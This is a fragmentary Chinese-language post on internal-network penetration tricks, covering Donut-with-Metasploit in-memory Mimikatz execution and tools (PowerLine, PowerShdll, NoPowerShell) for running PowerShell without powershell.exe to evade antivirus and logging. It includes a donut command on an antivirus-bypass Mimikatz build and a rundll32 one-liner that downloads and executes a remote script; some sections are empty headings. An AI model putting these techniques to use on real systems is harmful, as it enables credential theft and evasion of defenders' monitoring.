内网一些渗透技巧

内网一些渗透技巧"/>

内网一些渗透技巧

渗透技巧

msf+Donut交互式执行程序

简介

工具 Dount

Donut从VBScript，JScript，EXE，DLL（包括.NET程序集）文件生成x86或x64 Shellcode。 可以将此Shellcode注入到任意Windows进程中以在内存中执行。

使用方法

1. 先msf生成一个后门程序，执行

2. 然后执行

   /donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -0 /tmp/payload.bin

   －a：是指定位数，2位64位
   －o：是指定输出

   得到一个

3. 用msf执行模块

得到一个交互式mimikatz

无powershell运行powershell方法

PowerLine

简介

是一款由c#编写的工具，支持本地命令行调用和远程调用，可以在不直接调用PowerShell的情况下调用PowerShell脚本，优点如下：

• 自动识别win7、win10系统
• 使用方便,无需复杂的ide
• 自动xor编码
• …

下载地址

使用

• 首先拉取项目到本地，然后运行build.bat文件

• 然后在UserConf.xml文件中填写你所需要调用的powershell脚本的地址，默认自带powerup、powerview、Mimikatz等，只要按照他给定的格式加入你的ps脚本地址即可

• 加入完成以后，运行PLBuilder.exe进行构建

PowerShdll

简介

主要使用dll去运行powershell而不需要去连接powershell.exe,所以具有一定的bypassAV能力，当然它也可以在这几个程序下运行rundll32.exe, installutil.exe, regsvcs.exe, regasm.exe, regsvr32.exe或者使用作者给出的单独的exe进行执行

使用

• 使用PowerShdll -i进入到交互模式，此时便获得了一个交互式的PS环境，可执行任意的powershell命令

• dll版用法

  rundll32 PowerShdll.dll,main . { iwr -useb .ps1 } ^| iex;

Nopowershell

简介

是用C＃实现的工具，它支持执行类似PowerShell的命令，同时对任何PowerShell日志记录机制都不可见。同时也提供了CS下的cna脚本。

使用

.\NoPowerShell.exe

直接运行可得版本和帮助命令

SyncAppvPublishingServer

简介

使用

msbuild

microsoft.com